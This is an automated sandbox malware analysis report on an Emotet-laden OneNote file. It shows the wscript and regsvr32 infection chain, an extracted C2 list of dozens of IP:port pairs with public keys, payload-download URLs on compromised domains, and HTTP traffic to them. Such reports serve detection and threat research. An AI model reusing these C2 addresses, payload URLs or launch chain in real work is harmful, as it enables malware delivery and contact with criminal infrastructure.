

Windows Analysis Report
OMICS.one

Overview

General Information

Sample Name: OMICS.one
Analysis ID: 828486
MD5: cee0905efea3357f3dc9902754e5d47a
SHA1: 693fdea99a495b339d8dd372b759f370cf7f1b7a
SHA256: d72079bdae7c59361f934bf92ec1a53875008113541db11124d167cc2eb69b32
Tags: one
Infos:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • ONENOTE.EXE (PID: 5728 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\OMICS.one" MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 5928 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 5980 cmdline: "C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll" MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 5988 cmdline: "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 6048 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup
Name: Emotet
Description: While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid-2018 it has been used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It still steals information from victims, but the criminal gang behind it also opened another business channel by selling its infrastructure to deliver additional malicious software. Malware analysts have classified it into epochs depending on command and control, payloads, and delivery solutions, which change over time. Emotet was taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
Attribution:
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5tf2IdgAHAI4=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ff1AdgAvAIg="]}
Source: OMICS.one | Rule: JoeSecurity_MalOneNote | Description: Yara detected Malicious OneNote | Author: Joe Security

Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp | Rule: webshell_asp_obfuscated | Description: ASP webshell obfuscated | Author: Arnim Rupp
Strings:
  • 0xeda:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
  • 0xffa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
  • 0x58a:$jsp4: public
  • 0xbca:$jsp4: public
  • 0x244:$asp_payload11: wscript.shell
  • 0x1f04:$asp_payload11: wscript.shell
  • 0x228:$asp_multi_payload_one1: createobject
  • 0x98e:$asp_multi_payload_one1: createobject
  • 0xcc6:$asp_multi_payload_one1: createobject
  • 0x1aec:$asp_multi_payload_one1: createobject
  • 0x1bda:$asp_multi_payload_one1: createobject
  • 0x1c52:$asp_multi_payload_one1: createobject
  • 0x1cac:$asp_multi_payload_one1: createobject
  • 0x1ee8:$asp_multi_payload_one1: createobject
  • 0xc6c:$asp_multi_payload_one3: .run
  • 0x228:$asp_multi_payload_four1: createobject
  • 0x98e:$asp_multi_payload_four1: createobject
  • 0xcc6:$asp_multi_payload_four1: createobject
  • 0x1aec:$asp_multi_payload_four1: createobject
  • 0x1bda:$asp_multi_payload_four1: createobject
  • 0x1c52:$asp_multi_payload_four1: createobject

Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp | Rule: WEBSHELL_asp_generic | Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file | Author: Arnim Rupp
Strings:
  • 0xf6:$asp_gen_obf1: "+"
  • 0x126:$asp_gen_obf1: "+"
  • 0x1db6:$asp_gen_obf1: "+"
  • 0x1de6:$asp_gen_obf1: "+"
  • 0xeda:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
  • 0xffa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
  • 0x58a:$jsp4: public
  • 0xbca:$jsp4: public
  • 0x738:$asp_input1: request
  • 0x77a:$asp_input1: request
  • 0x890:$asp_input1: request
  • 0x1bca:$asp_input1: request
  • 0x244:$asp_payload11: wscript.shell
  • 0x1f04:$asp_payload11: wscript.shell
  • 0x228:$asp_multi_payload_one1: createobject
  • 0x98e:$asp_multi_payload_one1: createobject
  • 0xcc6:$asp_multi_payload_one1: createobject
  • 0x1aec:$asp_multi_payload_one1: createobject
  • 0x1bda:$asp_multi_payload_one1: createobject
  • 0x1c52:$asp_multi_payload_one1: createobject
  • 0x1cac:$asp_multi_payload_one1: createobject

Source: 00000004.00000002.632533152.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Source: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Source: 00000001.00000002.404361294.0000000005166000.00000004.00000020.00020000.00000000.sdmp | Rule: WEBSHELL_asp_generic | Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file | Author: Arnim Rupp
Strings:
  • 0x1abe:$asp_gen_obf1: "+"
  • 0x1aee:$asp_gen_obf1: "+"
  • 0x168a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x202:$jsp4: public
  • 0x842:$jsp4: public
  • 0x1f52:$jsp4: public
  • 0x3b0:$asp_input1: request
  • 0x3f2:$asp_input1: request
  • 0x508:$asp_input1: request
  • 0x18d2:$asp_input1: request
  • 0x1c0c:$asp_payload11: wscript.shell
  • 0x606:$asp_multi_payload_one1: createobject
  • 0x17f4:$asp_multi_payload_one1: createobject
  • 0x18e2:$asp_multi_payload_one1: createobject
  • 0x195a:$asp_multi_payload_one1: createobject
  • 0x19b4:$asp_multi_payload_one1: createobject
  • 0x1bf0:$asp_multi_payload_one1: createobject
  • 0x8e4:$asp_multi_payload_one3: .run
  • 0x606:$asp_multi_payload_four1: createobject
  • 0x17f4:$asp_multi_payload_four1: createobject
  • 0x18e2:$asp_multi_payload_four1: createobject
Source: 4.2.regsvr32.exe.bc0000.0.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Source: 4.2.regsvr32.exe.bc0000.0.raw.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Source: 3.2.regsvr32.exe.dd0000.0.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Source: 3.2.regsvr32.exe.dd0000.0.raw.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Malware Analysis System Evasion

Source: Process started Author: Joe Security: Data: Command: "C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll", CommandLine: "C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5928, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll", ProcessId: 5980, ProcessName: regsvr32.exe
Timestamp: 03/17/23-09:07:50.440401
Source IP: 192.168.2.4
Source Port: 49696
Destination IP: 104.168.155.143
Destination Port: 8080
Protocol: TCP
SID: 2404302
Classtype: A Network Trojan was detected

Timestamp: 03/17/23-09:07:07.082827
Source IP: 192.168.2.4
Source Port: 49686
Destination IP: 91.121.146.47
Destination Port: 8080
Protocol: TCP
SID: 2404344
Classtype: A Network Trojan was detected

Timestamp: 03/17/23-09:07:23.162928
Source IP: 192.168.2.4
Source Port: 49689
Destination IP: 182.162.143.56
Destination Port: 443
Protocol: TCP
SID: 2404312
Classtype: A Network Trojan was detected

Timestamp: 03/17/23-09:07:17.980118
Source IP: 192.168.2.4
Source Port: 49688
Destination IP: 66.228.32.31
Destination Port: 7080
Protocol: TCP
SID: 2404330
Classtype: A Network Trojan was detected

Timestamp: 03/17/23-09:07:36.723536
Source IP: 192.168.2.4
Source Port: 49691
Destination IP: 167.172.199.165
Destination Port: 8080
Protocol: TCP
SID: 2404308
Classtype: A Network Trojan was detected

AV Detection

Source: OMICS.one ReversingLabs: Detection: 30%
Source: OMICS.one Virustotal: Detection: 40%
Source: https://159.89.202.34:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://104.168.155.143:8080/l Avira URL Cloud: Label: malware
Source: https://159.89.202.34/ Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/ Avira URL Cloud: Label: malware
Source: https://164.90.222.65/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/11 Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/ Avira URL Cloud: Label: malware
Source: https://66.228.32.31:7080/Q Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/ Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/vM Avira URL Cloud: Label: malware
Source: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Z= Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/ Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/0 Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/ Avira URL Cloud: Label: malware
Source: https://159.89.202.34/q Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/ Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/tM Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM Avira URL Cloud: Label: malware
Source: https://66.228.32.31:7080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/X& Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/ Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0 Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/ Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM Avira URL Cloud: Label: malware
Source: https://104.168.155.143:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://164.90.222.65:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/? Avira URL Cloud: Label: malware
Source: https://187.63.160.88:80/ Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/yM Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/ Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/R Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/cw3 Avira URL Cloud: Label: malware
Source: https://104.168.155.143:8080/(SI Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6H Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/xM Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0 Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/ Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllB Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM Avira URL Cloud: Label: malware
Source: https://159.89.202.34/wn Avira URL Cloud: Label: malware
Source: https://penshorn.org:443/admin/Ses8712iGR8du/ Avira URL Cloud: Label: malware
Source: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/D= Avira URL Cloud: Label: malware
Source: https://164.90.222.65/0 Avira URL Cloud: Label: malware
Source: https://187.63.160.88:80/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ Avira URL Cloud: Label: malware
Source: penshorn.org Virustotal: Detection: 10%
Source: http://softwareulike.com/cWIYxWMPkK/ Virustotal: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll ReversingLabs: Detection: 58%
Source: C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy) ReversingLabs: Detection: 58%
Source: 00000004.00000002.632695477.0000000000EAD000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5tf2IdgAHAI4=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ff1AdgAvAIg="]}
Source: unknown HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2
Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008D28 FindFirstFileExW, 3_2_0000000180008D28

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Windows\SysWOW64\wscript.exe

Networking

Source: C:\Windows\System32\regsvr32.exe Network Connect: 164.90.222.65 443
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 203.26.41.131 443
Source: C:\Windows\SysWOW64\wscript.exe Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe Network Connect: 66.228.32.31 7080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 187.63.160.88 80
Source: C:\Windows\System32\regsvr32.exe Network Connect: 104.168.155.143 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 159.89.202.34 443
Source: C:\Windows\System32\regsvr32.exe Network Connect: 91.121.146.47 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 160.16.142.56 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443
Source: C:\Windows\System32\regsvr32.exe Network Connect: 167.172.199.165 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 163.44.196.120 8080
Source: Traffic Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49689 -> 182.162.143.56:443
Source: Traffic Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49686 -> 91.121.146.47:8080
Source: Traffic Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49688 -> 66.228.32.31:7080
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49691 -> 167.172.199.165:8080
Source: Traffic Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49696 -> 104.168.155.143:8080
Source: Malware configuration extractor IPs: 91.121.146.47:8080
Source: Malware configuration extractor IPs: 66.228.32.31:7080
Source: Malware configuration extractor IPs: 182.162.143.56:443
Source: Malware configuration extractor IPs: 187.63.160.88:80
Source: Malware configuration extractor IPs: 167.172.199.165:8080
Source: Malware configuration extractor IPs: 164.90.222.65:443
Source: Malware configuration extractor IPs: 104.168.155.143:8080
Source: Malware configuration extractor IPs: 163.44.196.120:8080
Source: Malware configuration extractor IPs: 160.16.142.56:8080
Source: Malware configuration extractor IPs: 159.89.202.34:443
Source: Malware configuration extractor IPs: 159.65.88.10:8080
Source: Malware configuration extractor IPs: 186.194.240.217:443
Source: Malware configuration extractor IPs: 149.56.131.28:8080
Source: Malware configuration extractor IPs: 72.15.201.15:8080
Source: Malware configuration extractor IPs: 1.234.2.232:8080
Source: Malware configuration extractor IPs: 82.223.21.224:8080
Source: Malware configuration extractor IPs: 206.189.28.199:8080
Source: Malware configuration extractor IPs: 169.57.156.166:8080
Source: Malware configuration extractor IPs: 107.170.39.149:8080
Source: Malware configuration extractor IPs: 103.43.75.120:443
Source: Malware configuration extractor IPs: 91.207.28.33:8080
Source: Malware configuration extractor IPs: 213.239.212.5:443
Source: Malware configuration extractor IPs: 45.235.8.30:8080
Source: Malware configuration extractor IPs: 119.59.103.152:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 95.217.221.146:8080
Source: Malware configuration extractor IPs: 153.126.146.25:7080
Source: Malware configuration extractor IPs: 197.242.150.244:8080
Source: Malware configuration extractor IPs: 202.129.205.3:8080
Source: Malware configuration extractor IPs: 103.132.242.26:8080
Source: Malware configuration extractor IPs: 139.59.126.41:443
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 183.111.227.137:8080
Source: Malware configuration extractor IPs: 5.135.159.50:443
Source: Malware configuration extractor IPs: 201.94.166.162:443
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 79.137.35.198:8080
Source: Malware configuration extractor IPs: 172.105.226.75:8080
Source: Malware configuration extractor IPs: 94.23.45.86:4143
Source: Malware configuration extractor IPs: 115.68.227.76:8080
Source: Malware configuration extractor IPs: 153.92.5.27:8080
Source: Malware configuration extractor IPs: 167.172.253.162:8080
Source: Malware configuration extractor IPs: 188.44.20.25:443
Source: Malware configuration extractor IPs: 147.139.166.154:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 185.4.135.165:8080
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Joe Sandbox View ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic HTTP traffic detected: POST /ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ HTTP/1.1 | Connection: Keep-Alive | Content-Length: 0 | Host: 182.162.143.56
Source: Joe Sandbox View IP Address: 110.232.117.186 110.232.117.186
Source: global traffic HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: penshorn.org
Source: global traffic TCP traffic: 192.168.2.4:49686 -> 91.121.146.47:8080
Source: global traffic TCP traffic: 192.168.2.4:49688 -> 66.228.32.31:7080
Source: global traffic TCP traffic: 192.168.2.4:49691 -> 167.172.199.165:8080
Source: global traffic TCP traffic: 192.168.2.4:49696 -> 104.168.155.143:8080
Source: global traffic TCP traffic: 192.168.2.4:49697 -> 163.44.196.120:8080
Source: global traffic TCP traffic: 192.168.2.4:49698 -> 160.16.142.56:8080
Source: unknown Network traffic detected: IP country count 17
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65
                Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                Source: unknownHTTP traffic detected: POST /ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
